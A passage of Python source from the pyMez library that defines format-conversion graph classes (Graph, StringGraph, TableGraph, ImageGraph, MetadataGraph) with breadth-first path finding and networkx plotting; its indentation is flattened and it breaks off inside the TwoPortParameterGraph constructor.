>>print output
<h3><a href="../../../Examples/Html/GraphModels_Example.html">GraphModels Example</a></h3>
Requirements
------------
+ [sys](https://docs.python.org/2/library/sys.html)
+ [os](https://docs.python.org/2/library/os.html?highlight=os#module-os)
+ [networkx](http://networkx.github.io/)
+ [numpy](http://www.numpy.org/)
+ [pyMez](https://github.com/aricsanders/pyMez)
Help
---------------
<a href="./index.html">`pyMez.Code.DataHandlers`</a>
<div>
<a href="../../../pyMez_Documentation.html">Documentation Home</a> |
<a href="../../index.html">API Documentation Home</a> |
<a href="../../../Examples/html/Examples_Home.html">Examples Home</a> |
<a href="../../../Reference_Index.html">Index</a>
</div>
"""
#-----------------------------------------------------------------------------
# Standard Imports
import re
import datetime
import sys
import os
#-----------------------------------------------------------------------------
# Third Party Imports
sys.path.append(os.path.join(os.path.dirname( __file__ ), '..','..'))
try:
from Code.Utils.Alias import *
METHOD_ALIASES=1
except:
print("The module pyMez.Code.Utils.Alias was not found")
METHOD_ALIASES=0
pass
try:
from Code.DataHandlers.GeneralModels import *
except:
print("The module pyMez.Code.DataHandlers.GeneralModels was not found,"
"please put it on the python path")
raise ImportError
try:
from Code.DataHandlers.TouchstoneModels import *
except:
print("The module pyMez.Code.DataHandlers.TouchstoneModels was not found,"
"please put it on the python path")
raise ImportError
try:
from Code.DataHandlers.Translations import *
except:
print("The module pyMez.Code.DataHandlers.Translations was not found or had an error,"
"please put it on the python path or resolve the error")
raise ImportError
try:
import numpy as np
except:
print("The module numpy was not found,"
"please put it on the python path")
raise ImportError
try:
import networkx
except:
print("The module networkx was not found,"
"please put it on the python path")
raise ImportError
#-----------------------------------------------------------------------------
# Module Constants
#-----------------------------------------------------------------------------
# Module Functions
# these functions are left as an example of graph edge functions
#todo: Change the names
def edge_1_to_2(in_string):
"A Test function for an edge for a Graph"
return in_string.splitlines()
def edge_2_to_1(string_list):
"""A test function for an edge in a Graph"""
return string_list_collapse(string_list)
def visit_all_nodes(graph):
"""Visit all nodes visits each node on a graph"""
nodes=graph.node_names
for node in nodes:
graph.move_to_node(node)
def visit_and_print_all_nodes(graph):
"""Visits all the nodes in graph and prints graph.data after each move"""
nodes=graph.node_names
for node in nodes:
graph.move_to_node(node)
print((graph.data))
def to_node_name(node_data):
"""Creates a node name given an input object, does a bit of silly type selecting and name rearranging. This matches for 75%
of the cases. There are a lot of user defined nodes without a clear path to generate a name. For instance the DataTableGraph
    node HpFile does not save with a .hp extension, so it would be auto-named TxtFile if it was only selected by the path name.
If it is auto selected it returns StringList because it is of the format ["file_path","schema_path"] """
# we retrieve the text version of the class name
class_name = node_data.__class__.__name__
node_name = class_name
# now for dict and list types we want to inspect the first Element to see what it is
if re.match('list', class_name):
node_name = "List"
try:
element_class_name = node_data[0].__class__.__name__
node_name = element_class_name + node_name
except:
pass
elif re.match('dict', class_name):
node_name = "Dictionary"
try:
element_class_name = list(node_data.values())[0].__class__.__name__
node_name = element_class_name + node_name
except:
pass
elif re.match('str', class_name):
node_name = "String"
# Now we have to check if it is an existing file name
if os.path.isfile(node_data):
node_name = "File"
extension = ""
try:
if re.search("\.", node_data):
extension = node_data.split(".")[-1]
node_name = extension.title() + node_name
except:
pass
elif fnmatch.fnmatch(node_data, "*.*"):
node_name = "File"
try:
if re.search("\.", node_data):
extension = node_data.split(".")[-1]
node_name = extension.title() + node_name
except:
pass
node_name = node_name.replace("str", "String").replace("dict", "Dictionary")
return (node_name)
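# Illustrative results of to_node_name (a sketch; the result for path-like strings
# depends on whether the file actually exists in the running environment):
#   to_node_name(["a", "b"]) -> "StringList"
#   to_node_name({"key": "value"}) -> "StringDictionary"
#   to_node_name("data.xml") -> "XmlFile"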
def TableGraph_to_Links(table_graph, **options):
"""Converts a table graph to a set of download links with embedded data in them"""
defaults = {"base_name": None,
"nodes": ['XmlFile', 'CsvFile', 'ExcelFile', 'OdsFile', 'MatFile', 'HtmlFile', 'JsonFile'],
"extensions": ['xml', 'csv', 'xlsx', 'ods', 'mat', 'html', 'json'],
"mime_types": ['application/xml', 'text/plain',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',
'application/vnd.oasis.opendocument.spreadsheet',
'application/x-matlab-data', 'text/html', 'application/json']}
conversion_options = {}
for key, value in defaults.items():
conversion_options[key] = value
for key, value in options.items():
conversion_options[key] = value
if conversion_options["base_name"] is None:
base_name = 'test.txt'
else:
base_name = conversion_options["base_name"]
nodes = conversion_options["nodes"]
extensions = conversion_options["extensions"]
mime_types = conversion_options["mime_types"]
out_links = ""
for node_index, node in enumerate(nodes):
table_graph.move_to_node(node)
file_path = table_graph.data
in_file = open(file_path, 'rb')
content_string = in_file.read()
link = String_to_DownloadLink(content_string,
suggested_name=change_extension(base_name, extensions[node_index]),
mime_type=mime_types[node_index],
text=extensions[node_index])
if node_index == len(nodes) - 1:
out_links = out_links + link
else:
out_links = out_links + link + " | "
return out_links
def remove_circular_paths(path):
"""Removes pieces of the path that just end on the same node"""
# Todo: Track the error that leaves out a needed path sometimes
# See http://localhost:8888/notebooks/Two_Port_Matrix_Parameters_Debug_20170105_001.ipynb
edge_pattern=re.compile("edge_(?P<begin_node>\w+)_(?P<end_node>\w+)_(?P<iterator>\w+)")
past_locations=[]
for index,edge in enumerate(path):
match=re.match(edge_pattern,edge)
begin_node=match.groupdict()["begin_node"]
end_node=match.groupdict()["end_node"]
past_locations.append(begin_node)
#print("{0} is {1}".format("past_locations",past_locations))
new_path=[]
node_index=0
between_list=[False for item in past_locations]
while(node_index<len(past_locations)):
node=past_locations[node_index]
old_path=new_path
new_path=[]
# if you visit a location more than one
number_of_visits=past_locations.count(node)
if number_of_visits>1:
#print("{0} is {1}".format("node",node))
#print("{0} is {1}".format("past_locations",past_locations))
# Now find all the visits to that location
equality_list=[x==node for x in past_locations]
print(("{0} is {1}".format("equality_list",equality_list)))
# You are intially not between visits
between=False
# every time you cross that node you flip between, as long as there are
visit_number=0
for index,equality in enumerate(equality_list):
if equality:
# add one to the visit number
visit_number+=1
# Flip the between truth value if it is the first or last
# visits only
if visit_number==1 or visit_number==number_of_visits:
between=not between
between_list[index]=between or between_list[index]
else:
between_list[index]=between or between_list[index]
else:
between_list[index]=between or between_list[index]
#print("{0} is {1}".format("between_list",between_list))
for index,item in enumerate(between_list):
if not item:
new_path.append(path[index])
node_index+=1
if new_path in [[]]:
new_path=path
return new_path
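# A minimal sketch of what remove_circular_paths is meant to do (illustrative edge names;
# see the todo above about paths that can occasionally be trimmed too aggressively):
#   remove_circular_paths(["edge_A_B_000", "edge_B_A_000", "edge_A_C_000"])
#   -> ["edge_A_C_000"]   # the A -> B -> A loop is dropped, the A -> C step is kept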
#-----------------------------------------------------------------------------
# Module Classes
# getting around to adding a breadth first graph solver to Graph class
# modify the find_path method
class Graph(object):
"""The Graph class creates a content graph that has as nodes different formats. As
a format is added via graph.add_node() by specifying a node name and a function from an
existing node into the new one, and one exiting the node. Once a series of nodes exists
to enter the graph at a node use graph.set_state() the current data representing the
state is in the attribute graph.data. To move among the formats use graph.move_to_node('NodeName')
need to recode the find_path method using a shortest path alogrithm like
[Dijkstra](https://en.wikipedia.org/wiki/Dijkstra%27s_algorithm).
"""
def __init__(self, **options):
"""Initializes the graph. The first 2 nodes and two edges forming a bijection between them are required"""
defaults = {"graph_name": "Graph",
"node_names": ['n1', 'n2'],
"node_descriptions": ["A plain string",
"A list of strings with no \\n, created with string.splitlines()"],
"current_node": 'n1',
"state": [1, 0],
"data": "This is a test string\n it has to have multiple lines \n and many characters 34%6\n^",
"edge_2_to_1": edge_2_to_1,
"edge_1_to_2": edge_1_to_2
}
self.options = {}
for key, value in defaults.items():
self.options[key] = value
for key, value in options.items():
self.options[key] = value
self.elements = ['graph_name', 'node_names', 'node_descriptions', 'current_node', 'state', 'data']
for element in self.elements:
self.__dict__[element] = self.options[element]
self.edges = []
self.edge_matrices = []
self.state_matrix = np.matrix(self.state).T
# Add the first 2 edges, required to intialize the graph properly
self.display_graph = networkx.DiGraph()
self.add_edge(self.node_names[0], self.node_names[1], self.options["edge_1_to_2"])
self.add_edge(self.node_names[1], self.node_names[0], self.options["edge_2_to_1"])
self.jumps = []
self.external_node_names = []
self.external_node_descriptions = []
self.display_layout = networkx.spring_layout(self.display_graph)
def get_description_dictionary(self):
"returns a dictionary of the form {NodeName:Node Description for all of the current nodes"
dictionary = {node_name: self.node_descriptions[index] for index, node_name in enumerate(self.node_names)}
return dictionary
def set_state(self, node_name, node_data):
"""Sets the graph state to be the state specified by node_name, and node_data"""
try:
current_node_state_position = self.node_names.index(node_name)
self.current_node = node_name
self.data = node_data
self.state = [0 for i in range(len(self.node_names))]
self.state[current_node_state_position] = 1
self.state_matrix = np.matrix(self.state).T
except:
print(("Could not set the state of graph: {0}".format(self.graph_name)))
raise
def add_edge(self, begin_node=None, end_node=None, edge_function=None):
"""Adds an edge mapping one node to another, required input is begin_node (it's name)
end_node, and the edge function"""
# check to see if edge is defined if it is increment a number
edge_match = re.compile("edge_{0}_{1}".format(begin_node, end_node))
keys = list(self.__dict__.keys())
# print keys
iterator = 0
for key in keys:
if re.match(edge_match, key):
iterator += 1
edge_name = "edge_{0}_{1}_{2:0>3d}".format(begin_node, end_node, iterator)
self.__dict__[edge_name] = edge_function
self.edges.append(edge_name)
edge_matrix = np.zeros((len(self.state), len(self.state)))
begin_position = self.node_names.index(begin_node)
end_position = self.node_names.index(end_node)
edge_matrix[end_position][begin_position] = 1
edge_matrix = np.matrix(edge_matrix)
self.edge_matrices.append(edge_matrix)
self.display_graph.add_edge(begin_node, end_node)
self.display_layout = networkx.spring_layout(self.display_graph)
def add_jump(self, begin_node=None, end_node=None, jump_function=None):
"""Adds a jump mapping one internal node to an external node, required input is begin_node (it's name)
end_node, and the edge function"""
# check to see if edge is defined if it is increment a number
jump_match = re.compile("jump_{0}_{1}".format(begin_node, end_node))
keys = list(self.__dict__.keys())
# print keys
iterator = 0
for key in keys:
if re.match(jump_match, key):
iterator += 1
jump_name = "jump_{0}_{1}_{2:0>3d}".format(begin_node, end_node, iterator)
self.__dict__[jump_name] = jump_function
self.jumps.append(jump_name)
self.display_graph.add_edge(begin_node, end_node)
self.display_layout = networkx.spring_layout(self.display_graph)
def move_to(self, path, **options):
"""Changes the state of the graph by moving along the path specified"""
defaults = {"debug": False, "verbose": False}
move_options = {}
for key, value in defaults.items():
move_options[key] = value
for key, value in options.items():
move_options[key] = value
if move_options["debug"]:
print(path)
for index, edge in enumerate(path):
# print edge
edge_pattern = 'edge_(?P<begin_node>\w+)_(?P<end_node>\w+)_(?P<iterator>\w+)'
match = re.match(edge_pattern, edge)
begin_node = match.groupdict()['begin_node']
end_node = match.groupdict()['end_node']
if move_options["verbose"]:
print(("moving {0} -> {1}".format(begin_node, end_node)))
# print self.data
self.data = self.__dict__[edge](self.data)
# print self.data
self.current_node = match.groupdict()['end_node']
self.state = [0 for i in range(len(self.node_names))]
position = self.node_names.index(self.current_node)
self.state[position] = 1
self.state_matrix = np.matrix(self.state).T
# print self.state
# print self.current_node
def virtual_move_to(self, path):
"""virtual_move_to simulates moving but does not change the state of the graph"""
# print path
temp_state = self.state
temp_data = self.data
temp_current_node = self.current_node
temp_node_names = self.node_names
for index, edge in enumerate(path):
# print edge
edge_pattern = 'edge_(?P<begin_node>\w+)_(?P<end_node>\w+)_(?P<iterator>\w+)'
match = re.match(edge_pattern, edge)
begin_node = match.groupdict()['begin_node']
end_node = match.groupdict()['end_node']
# print("moving {0} -> {1}".format(begin_node,end_node))
# print self.data
temp_data = self.__dict__[edge](temp_data)
# print self.data
temp_current_node = match.groupdict()['end_node']
temp_state = [0 for i in range(len(temp_node_names))]
position = temp_node_names.index(temp_current_node)
temp_state[position] = 1
# print temp_state
# print self.state
# print self.current_node
def __str__(self):
return str(self.data)
def add_node(self, node_name, edge_into_node_begin, edge_into_node_function, edge_out_node_end,
edge_out_node_function, node_description=None):
"""Adds a node to the graph. Required input is node_name (a string with no spaces),
        a reference to an entering node, the function mapping the entering node to the new node,
a reference to an exiting node and the function mapping the
new node to the exiting node."""
# first check if node into and out of node is good
self.node_names.append(node_name)
self.state.append(0)
self.state_matrix = np.matrix(self.state).T
for index, matrix in enumerate(self.edge_matrices):
pad_row = np.zeros((1, len(matrix)))
new_matrix = np.concatenate((matrix, pad_row), axis=0)
pad_column = np.zeros((1, len(self.node_names)))
new_matrix = np.concatenate((new_matrix, pad_column.T), axis=1)
# print("New matrix is :\n{0}".format(new_matrix))
self.edge_matrices[index] = new_matrix
self.add_edge(begin_node=node_name, end_node=edge_out_node_end, edge_function=edge_out_node_function)
self.add_edge(begin_node=edge_into_node_begin, end_node=node_name, edge_function=edge_into_node_function)
if node_description:
self.node_descriptions.append(node_description)
self.display_graph.add_node(node_name)
self.display_graph.add_edge(node_name, edge_out_node_end)
self.display_graph.add_edge(edge_into_node_begin, node_name)
self.display_layout = networkx.spring_layout(self.display_graph)
def add_external_node(self, external_node_name, jump_into_node_begin,
jump_into_node_function, external_node_description=None):
"""Adds an external node to the graph. Required input is node_name (a string with no spaces),
        a reference to an entering node, and the function mapping the entering node to the new external node"""
# first check if node into and out of node is good
self.external_node_names.append(external_node_name)
self.add_jump(begin_node=jump_into_node_begin, end_node=external_node_name,
jump_function=jump_into_node_function)
if external_node_description:
self.external_node_descriptions.append(external_node_description)
self.display_graph.add_node(external_node_name)
self.display_graph.add_edge(jump_into_node_begin, external_node_name)
self.display_layout = networkx.spring_layout(self.display_graph)
def jump_to_external_node(self, external_node_name, **options):
"""Returns the result of the jump, the graph is left in the node that is the begining of the jump"""
end_node = external_node_name
jump_pattern = 'jump_(?P<begin_node>\w+)_{0}_(?P<iterator>\w+)'.format(end_node)
for jump in self.jumps[:]:
jump_match = re.match(jump_pattern, jump, re.IGNORECASE)
if jump_match:
jump_to_use = jump
begin_node = jump_match.groupdict()["begin_node"]
self.move_to_node(begin_node)
return self.__dict__[jump_to_use](self.data, **options)
def path_length(self, path, num_repeats=10):
"""Determines the length of a given path, currently the metric is based on the time to move to."""
begin_time = datetime.datetime.now()
# num_repeats=100
for i in range(num_repeats):
self.virtual_move_to(path)
end_time = datetime.datetime.now()
delta_t = end_time - begin_time
path_length = delta_t.total_seconds() / float(num_repeats)
if path_length == 0.0:
print("Warning the path length is less than 1 microsecond,"
"make sure num_repeats is high enough to measure it.")
return path_length
def is_path_valid(self, path):
"""Returns True if the path is valid from the current node position or False otherwise"""
null_state = [0 for i in range(len(self.node_names))]
null_state_matrix = np.matrix(null_state).T
new_state = np.matrix(self.state).T
for index, edge in enumerate(path):
# print index
# print edge
edge_position = self.edges.index(edge)
move_matrix = self.edge_matrices[edge_position]
# print move_matrix
new_state = move_matrix * new_state
if new_state.any() == null_state_matrix.any():
# print new_state
# print null_state_matrix
return False
return True
def get_entering_nodes(self, node):
"""Returns all nodes that have an edge that enter the specificed node"""
enter_edge_pattern = re.compile('edge_(?P<begin_node>\w+)_{0}_(?P<iterator>\w+)'.format(node))
enter_nodes = []
for index, edge in enumerate(self.edges):
enter_match = re.match(enter_edge_pattern, edge)
if enter_match:
enter_node = enter_match.groupdict()['begin_node']
enter_nodes.append(enter_node)
return enter_nodes
def get_entering_edges(self, node):
"""Returns all edges that enter the specificed node"""
enter_edge_pattern = re.compile('edge_(?P<begin_node>\w+)_{0}_(?P<iterator>\w+)'.format(node))
enter_edges = []
for index, edge in enumerate(self.edges):
if re.match(enter_edge_pattern, edge):
enter_edges.append(edge)
return enter_edges
def get_exiting_edges(self, node):
"""Returns all edges that exit the specificed node"""
exit_edge_pattern = re.compile('edge_{0}_(?P<end_node>\w+)_(?P<iterator>\w+)'.format(node))
exit_edges = []
for index, edge in enumerate(self.edges):
if re.match(exit_edge_pattern, edge):
exit_edges.append(edge)
return exit_edges
def get_exiting_nodes(self, node):
"""Returns all nodes that have an edge leaving the specificed node"""
exit_edge_pattern = re.compile('edge_{0}_(?P<end_node>\w+)_(?P<iterator>\w+)'.format(node))
exit_nodes = []
for index, edge in enumerate(self.edges):
exit_match = re.match(exit_edge_pattern, edge)
if exit_match:
exit_node = exit_match.groupdict()['end_node']
exit_nodes.append(exit_node)
return exit_nodes
def get_path(self, first_node, last_node, **options):
"""Returns the first path found between first node and last node, uses a breadth first search algorithm"""
defaults = {"debug": False, "method": "BreathFirst"}
self.get_path_options = {}
for key, value in defaults.items():
self.get_path_options[key] = value
for key, value in options.items():
self.get_path_options[key] = value
unvisited_nodes = self.node_names[:]
unvisited_nodes.remove(first_node)
visited_nodes = [first_node]
node_history = []
edge_history = []
path_queue = []
possible_paths = []
queue = []
current_edge = []
queue.append(first_node)
path = {first_node: []}
while queue:
# first remove the
current_node = queue.pop(0)
if path_queue != []:
current_edge = path_queue.pop(0)
edge_history.append(current_edge)
node_history.append(current_node)
if self.get_path_options["debug"]:
print(("current_node is {0}".format(current_node)))
print(("current_edge is {0}".format(current_edge)))
# if this node is the destination exit returning the path
if current_node == last_node:
if self.get_path_options["debug"]:
print(("Node path was found to be {0}".format(node_path)))
print(("path was found to be {0}".format(edge_path)))
print(("{0} is {1}".format("path", path)))
return path[last_node][::-1]
adjacent_nodes = self.get_exiting_nodes(current_node)
adjacent_paths = self.get_exiting_edges(current_node)
if self.get_path_options["debug"]:
print(("{0} are {1}".format("adjacent_nodes", adjacent_nodes)))
print(("{0} are {1}".format("adjacent_paths", adjacent_paths)))
current_history = edge_history
for node_index, node in enumerate(adjacent_nodes):
if node not in visited_nodes:
queue.append(node)
path_queue.append(adjacent_paths[node_index])
visited_nodes.append(node)
path[node] = [adjacent_paths[node_index]] + path[current_node]
path[node]
# possible_paths.append(current_path.append(node))
if self.get_path_options["debug"]:
print(("{0} is {1}".format("path_queue", path_queue)))
def move_to_node(self, node):
"""Moves from current_node to the specified node"""
path = self.get_path(self.current_node, node)
self.move_to(path)
def check_closed_path(self):
"""Checks that data is not changed for the first closed path found. Returns True if data==data after
moving around the closed path, False otherwise. Starting point is current_node """
temp_data = self.data
path = self.get_path(self.current_node, self.current_node)
if self.is_path_valid(path):
pass
else:
print("Path is not valid, graph definition is broken")
            raise ValueError("Path is not valid, graph definition is broken")
out = temp_data == self.data
out_list = [self.current_node, path, out]
print(("The assertion that the data remains unchanged,\n"
"for node {0} following path {1} is {2}".format(*out_list)))
return out
def is_graph_isomorphic(self):
"""Returns True if all nodes have closed paths that preserve the data, False otherwise"""
out = True
for node in self.node_names:
self.move_to_node(node)
            if not self.check_closed_path():
out = False
return out
def show(self, **options):
"""Shows the graph using matplotlib and networkx"""
        # Should be separated to allow for fixed presentation?
defaults = {"descriptions": False, "edge_descriptions": False, "save_plot": False,
"path": None, "active_node": True, "directory": None,
"specific_descriptor": self.graph_name.replace(" ", "_"),
"general_descriptor": "plot", "file_name": None,
"arrows": True, "node_size": 1000, "font_size": 10, "fix_layout": True}
show_options = {}
for key, value in defaults.items():
show_options[key] = value
for key, value in options.items():
show_options[key] = value
if show_options["directory"] is None:
show_options["directory"] = os.getcwd()
if show_options["active_node"]:
node_colors = []
for node in self.display_graph.nodes():
if node == self.current_node:
node_colors.append('b')
else:
if node in self.node_names:
node_colors.append('r')
elif node in self.external_node_names:
node_colors.append('g')
else:
node_colors = ['r' for node in self.node_names] + ['g' for node in self.node_names]
# print("{0} is {1}".format('node_colors',node_colors))
if show_options["descriptions"]:
node_labels = {node: self.node_descriptions[index] for index,
node in enumerate(self.node_names)}
if self.external_node_names:
for index, node in enumerate(self.external_node_names):
node_labels[node] = self.external_node_descriptions[index]
networkx.draw_networkx(self.display_graph, arrows=show_options["arrows"],
labels=node_labels, node_color=node_colors,
node_size=show_options["node_size"], font_size=show_options["font_size"],
pos=self.display_layout)
# print("{0} is {1}".format('node_labels',node_labels))
else:
networkx.draw_networkx(self.display_graph, arrows=show_options["arrows"], node_color=node_colors,
node_size=show_options["node_size"], font_size=show_options["font_size"],
pos=self.display_layout)
plt.axis('off')
plt.suptitle(self.options["graph_name"])
if show_options["file_name"] is None:
file_name = auto_name(specific_descriptor=show_options["specific_descriptor"],
general_descriptor=show_options["general_descriptor"],
directory=show_options["directory"], extension='png', padding=3)
else:
file_name = show_options["file_name"]
if show_options["save_plot"]:
# print file_name
if show_options["path"]:
plt.savefig(show_options["path"])
else:
plt.savefig(os.path.join(show_options["directory"], file_name))
else:
plt.show()
fig = plt.gcf()
return fig
class StringGraph(Graph):
"""String Graph is a graph relating different string forms"""
def __init__(self,**options):
"""Intializes the StringGraph Class by defining nodes and edges"""
defaults={"graph_name":"StringGraph",
"node_names":['String','StringList'],
"node_descriptions":["A plain string",
"A list of strings with no \\n, created with string.splitlines()"],
"current_node":'String',
"state":[1,0],
"data":"This is a test string\n it has to have multiple lines \n and many characters 34%6\n^",
"edge_2_to_1":edge_2_to_1,
"edge_1_to_2":edge_1_to_2
}
self.options={}
for key,value in defaults.items():
self.options[key]=value
for key,value in options.items():
self.options[key]=value
Graph.__init__(self,**self.options)
self.add_node("File","String",String_to_File,"String",File_to_String,node_description="Plain File")
self.add_node("CStringIo","String",String_to_CStringIo,"String",CStringIo_to_String,node_description="C File Like Object")
self.add_node("StringIo","String",String_to_StringIo,"String",StringIo_to_String,node_description="File Like Object")
self.add_edge(begin_node="StringList",end_node="File",edge_function=StringList_to_File)
# Changed from ColumnModeledGraph to TableGraph 12/14/2016 by AWS
class TableGraph(Graph):
"""Class that transforms column modeled data (table) from one format to another, use set_state to initialize to
your data.
#!python
defaults={"graph_name":"Table Graph",
"node_names":['DataFrame','AsciiDataTable'],
"node_descriptions":["Pandas Data Frame","AsciiDataTable"],
"current_node":'DataFrame',
"state":[1,0],
"data":pandas.DataFrame([[1,2,3],[3,4,5]],columns=["a","b","c"]),
"edge_2_to_1":AsciiDataTable_to_DataFrame,
"edge_1_to_2":DataFrame_to_AsciiDataTable}
"""
def __init__(self,**options):
defaults={"graph_name":"Table Graph",
"node_names":['DataFrame','AsciiDataTable'],
"node_descriptions":["Pandas Data Frame","AsciiDataTable"],
"current_node":'DataFrame',
"state":[1,0],
"data":pandas.DataFrame([[1,2,3],[3,4,5]],columns=["a","b","c"]),
"edge_2_to_1":AsciiDataTable_to_DataFrame,
"edge_1_to_2":DataFrame_to_AsciiDataTable}
self.options={}
for key,value in defaults.items():
self.options[key]=value
for key,value in options.items():
self.options[key]=value
Graph.__init__(self,**self.options)
self.add_node("HdfFile","DataFrame",DataFrame_to_HdfFile,
"DataFrame",HdfFile_to_DataFrame,
node_description="HDF File")
self.add_node("XmlDataTable","AsciiDataTable",AsciiDataTable_to_XmlDataTable,
"AsciiDataTable",XmlDataTable_to_AsciiDataTable,
node_description="XML Data Table")
# Need to add XML File and Html File using save and save_HTML()
self.add_node("ExcelFile","DataFrame",DataFrame_to_ExcelFile,
"DataFrame",ExcelFile_to_DataFrame,
node_description="Excel File")
self.add_node("OdsFile","ExcelFile",ExcelFile_to_OdsFile,
"ExcelFile",OdsFile_to_ExcelFile,"Open Office Spreadsheet")
self.add_node("HtmlString","DataFrame",DataFrame_to_HtmlString,
"DataFrame",HtmlString_to_DataFrame,
node_description="HTML String")
# Note a lot of the pandas reading and writing cause float64 round off errors
        # applymap(lambda x: np.around(x,10)) on all float fields will fix this
# also the column names move about in order
self.add_node("JsonFile","DataFrame",DataFrame_to_JsonFile,
"DataFrame",JsonFile_to_DataFrame,
node_description="JSON File")
self.add_node("JsonString","DataFrame",DataFrame_to_JsonString,
"DataFrame",JsonString_to_DataFrame,
node_description="JSON String")
self.add_node("CsvFile","DataFrame",DataFrame_to_CsvFile,
"DataFrame",CsvFile_to_DataFrame,
node_description="CSV File")
self.add_node("MatFile","AsciiDataTable",AsciiTable_to_MatFile,
"AsciiDataTable",MatFile_to_AsciiTable,
node_description="Matlab File")
self.add_node("XmlFile","XmlDataTable",XmlDataTable_to_XmlFile,
"XmlDataTable",XmlFile_to_XmlDataTable,
node_description="XML DataTable Saved As a File")
self.add_node("HtmlFile","HtmlString",HtmlString_to_HtmlFile,
"HtmlString",HtmlFile_to_HtmlString,
node_description="HTML File")
self.add_edge("DataFrame","HtmlFile",DataFrame_to_HtmlFile)
self.add_edge("JsonFile","XmlDataTable",JsonFile_to_XmlDataTable)
self.add_external_node("XsltResultString","XmlDataTable",XmlBase_to_XsltResultString,
external_node_description="XSLT Results String")
self.add_external_node("XsltResultFile","XmlDataTable",XmlBase_to_XsltResultFile,
external_node_description="XSLT Results File")
class ImageGraph(Graph):
"""A transformation graph for images node types are image formats and external nodes are
common image processing functions
#!python
defaults={"graph_name":"Image Graph",
"node_names":['Image','png'],
"node_descriptions":["PIL Image","png"],
"current_node":'Image',
"state":[1,0],
"data":PIL.Image.open(os.path.join(TESTS_DIRECTORY,'test.png')),
"edge_2_to_1":File_to_Image,
"edge_1_to_2":lambda x: Image_to_FileType(x,file_path="test",extension="png")}
"""
def __init__(self,**options):
defaults={"graph_name":"Image Graph",
"node_names":['Image','Png'],
"node_descriptions":["PIL Image","Png"],
"current_node":'Image',
"state":[1,0],
"data":PIL.Image.open(os.path.join(TESTS_DIRECTORY,'test.png')),
"edge_2_to_1":File_to_Image,
"edge_1_to_2":lambda x: Image_to_FileType(x,file_path="test",extension="png")}
self.options={}
for key,value in defaults.items():
self.options[key]=value
for key,value in options.items():
self.options[key]=value
Graph.__init__(self,**self.options)
self.add_node("Jpg","Image",lambda x: Image_to_FileType(x,file_path="test",extension="jpg"),
"Image",File_to_Image,node_description="Jpg File")
self.add_node("Tiff","Image",lambda x: Image_to_FileType(x,file_path="test",extension="tiff"),
"Image",File_to_Image,node_description="Tif File")
self.add_node("Gif","Image",lambda x: Image_to_FileType(x,file_path="test",extension="gif"),
"Image",File_to_Image,node_description="Gif File")
self.add_node("Bmp","Image",lambda x: Image_to_FileType(x,file_path="test",extension="bmp"),
"Image",File_to_Image,node_description="BMP File")
self.add_node("Base64","Png",PngFile_to_Base64,
"Png",Base64_to_PngFile,node_description="Base 64 PNG")
self.add_node("EmbeddedHtml","Base64",Base64Png_to_EmbeddedHtmlString,
"Base64",EmbeddedHtmlString_to_Base64Png,node_description="Embedded HTML of PNG")
self.add_node("Ndarray","Png",PngFile_to_Ndarray,
"Png",Ndarray_to_PngFile,node_description="Numpy Array")
self.add_node("MatplotlibFigure","Ndarray",Ndarray_to_MatplotlibFigure,
"Png",MatplotlibFigure_to_PngFile,node_description="MatplotlibFigure")
self.add_external_node("Thumbnail","Image",Image_to_ThumbnailFile,external_node_description="JPEG Thumbnail")
self.add_external_node("Matplotlib","Ndarray",Ndarray_to_Matplotlib,
external_node_description="Matplotlib Plot")
class MetadataGraph(Graph):
"""Metadata Graph is a graph representing the content of key,value metadata"""
def __init__(self,**options):
"""Intializes the metadata graph class"""
defaults={"graph_name":"Metadata Graph",
"node_names":['Dictionary','JsonString'],
"node_descriptions":["Python Dictionary","Json string"],
"current_node":'Dictionary',
"state":[1,0],
"data":{"a":"First","b":"Second"},
"edge_2_to_1":JsonString_to_Dictionary,
"edge_1_to_2":Dictionary_to_JsonString}
self.options={}
for key,value in defaults.items():
self.options[key]=value
for key,value in options.items():
self.options[key]=value
Graph.__init__(self,**self.options)
self.add_node("JsonFile","JsonString",JsonString_to_JsonFile,
"JsonString",JsonFile_to_JsonString,node_description="JSON File")
self.add_node("XmlString","Dictionary",Dictionary_to_XmlString,
"Dictionary",XmlString_to_Dictionary,node_description="XML string")
self.add_node("HtmlMetaString","Dictionary",Dictionary_to_HtmlMetaString,
"Dictionary",HtmlMetaString_to_Dictionary,node_description="HTML meta tags")
self.add_node("XmlTupleString","Dictionary",Dictionary_to_XmlTupleString,
"Dictionary",XmlTupleString_to_Dictionary,node_description="Tuple Line")
self.add_node("PickleFile","Dictionary",Dictionary_to_PickleFile,
"Dictionary",PickleFile_to_Dictionary,node_description="Pickled File")
self.add_node("ListList","Dictionary",Dictionary_to_ListList,
"Dictionary",ListList_to_Dictionary,node_description="List of lists")
self.add_node("HeaderList","Dictionary",Dictionary_to_HeaderList,
"Dictionary",HeaderList_to_Dictionary,node_description="Header List")
self.add_node("DataFrame","Dictionary",Dictionary_to_DataFrame,
"Dictionary",DataFrame_to_Dictionary,node_description="Pandas DataFrame")
self.add_node("AsciiDataTable","DataFrame",DataFrame_to_AsciiDataTable,
"DataFrame",AsciiDataTable_to_DataFrame,node_description="AsciiDataTable")
self.add_node("MatFile","AsciiDataTable",AsciiTable_to_MatFile,
"AsciiDataTable",MatFile_to_AsciiDataTableKeyValue,node_description="Matlab")
self.add_node("ExcelFile","DataFrame",DataFrame_to_ExcelFile,
"DataFrame",ExcelFile_to_DataFrame,node_description="excel")
self.add_node("HdfFile","DataFrame",DataFrame_to_HdfFile,
"DataFrame",HdfFile_to_DataFrame,node_description="hdf file")
self.add_node("CsvFile","DataFrame",DataFrame_to_CsvFile,
"DataFrame",CsvFile_to_DataFrame,node_description="CSV File")
self.add_node("HtmlFile","DataFrame",DataFrame_to_HtmlFile,
"DataFrame",HtmlFile_to_DataFrame,node_description="HTML Table File")
self.add_node("HtmlTableString","HtmlFile",HtmlFile_to_HtmlString,
"HtmlFile",HtmlString_to_HtmlFile,node_description="HTML Table String")
class TwoPortParameterGraph(Graph):
"""TwoPortParamterGraph is a content graph for two-port parameters,
it transforms between S,T,Y,Z,ABCD and H parameters and matrix versions.
#!python
defaults={"graph_name":"Two Port Parameter Graph",
"node_names":["SFrequencyList",'SFrequencyMatrixList'],
"node_descriptions":["S Parameters","S Parameters in a Matrix"],
"current_node":'SFrequencyList',
"state":[1,0],
"data":[[1.0,.9,.436,.436,.9]],
"edge_2_to_1":FrequencyMatrixList_to_FrequencyList,
"edge_1_to_2":FrequencyList_to_FrequencyMatrixList,
"frequency_units":"GHz",
"Z01":50,
"Z02":50 }
"""
def __init__(self,**options):
